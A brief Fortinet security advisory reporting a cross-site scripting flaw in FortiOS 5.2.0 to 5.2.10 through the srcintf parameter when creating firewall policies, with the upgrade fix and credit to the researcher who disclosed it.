PSIRT Advisory

FortiOS XSS via srcintf during Firewall Policy Creation

Summary

An XSS vulnerability caused by the scrintf parameter input during Firewall Policy Creation can be exploited to load and run a remote (malicious) Javascript in a logged in browser.

Impact

Execute unauthorized code or commands

Affected Products

FortiOS versions 5.2.0 to 5.2.10

Solutions

Upgrade to FortiOS version 5.2.11

Acknowledgement

Fortinet is pleased to thank independent researcher Amir Morshedizadeh for reporting this vulnerability under responsible disclosure.